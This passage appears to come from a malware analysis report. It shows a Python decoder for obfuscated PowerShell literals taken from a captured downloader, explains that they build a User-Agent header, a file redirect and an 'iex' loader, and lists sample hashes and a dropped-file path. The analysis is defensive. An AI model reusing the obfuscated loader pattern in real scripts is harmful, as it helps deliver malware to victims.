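    """Decode every `Forhandlingsresultat '<literal>'` call found in a script body."""
    return [deobfuscate(lit) for lit in CALL_RE.findall(script)]


# Literals copied verbatim from the captured powershell.exe command line.
SAMPLE = (
    "$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';"
    "$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';"
    "$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';"
    "$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';"
)
SAMPLE_NAMES = ("$Befattedes", "$Manutagi", "$Forkromningens", "$Conacaste")

if __name__ == "__main__":
    for name, decoded in zip(SAMPLE_NAMES, decode_calls(SAMPLE)):
        print("%-16s -> %r" % (name, decoded))
```

$Befattedes is the start of a Firefox User-Agent string, $Manutagi the header name it is sent under (the mixed case is the generator's, and HTTP header names are case-insensitive), $Forkromningens the `>` redirect used when the downloaded payload is written out, and $Conacaste the `iex` that Restrainedness invokes. Run against the full script from the original .vbs, decode_calls yields the download URL and the file-write and loader statements in execution order.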
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 469KB
MD5: 598347a0bcbbbba59adef833a5b27d72
SHA1: 149039d2fea4a3a940884c9eb8689d59a957a4a2
SHA256: ed6dd1b56c22e70a8f7ed2582803ce7731ab5d3210a065d26d34e2ac78e5ef6b
SHA512: ae6d040c03aef912f53a29596d25be5832d7faa42ba41b64c287a633f483dd09f26818687fcc5155b1873433a1482cd53357b5b414e6dc4652ae600c3739b236

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT81W65D14Y6LC4LW84X.temp
Filesize: 7KB
MD5: d06b845bcd725bafe79916221cf6142b
SHA1: 2bb84d812c0e51dd8b64f73867f6d739495ff036
SHA256: dd852e17dd21105b245987d45510642db7fd07c98124ef3ba67cc35ae3a123d2
SHA512: feb696650277cff90668ef61bfb2f44145c4ee2b0da58ec61df75aa8c08aca60b4e5a32cf62d5548d0b076f86f06583386c7a1c31f41fb2319fd305570e41570